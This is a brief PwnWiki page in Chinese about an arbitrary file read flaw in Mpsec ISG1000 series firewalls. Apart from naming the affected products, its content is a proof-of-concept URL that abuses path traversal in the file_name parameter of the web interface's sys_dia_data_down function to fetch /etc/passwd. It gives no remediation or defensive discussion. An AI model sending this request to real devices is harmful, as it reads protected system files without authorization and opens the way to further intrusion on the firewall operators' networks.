Mpsec isg1000防火墙任意文件读取漏洞

From PwnWiki
This page is a translated version of the page Mpsec isg1000防火牆任意文件讀取漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎中文(中国大陆)‎ • ‎中文(台灣)‎

漏洞影响

Mpsec isg1000系列防火墙

POC

https://example/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd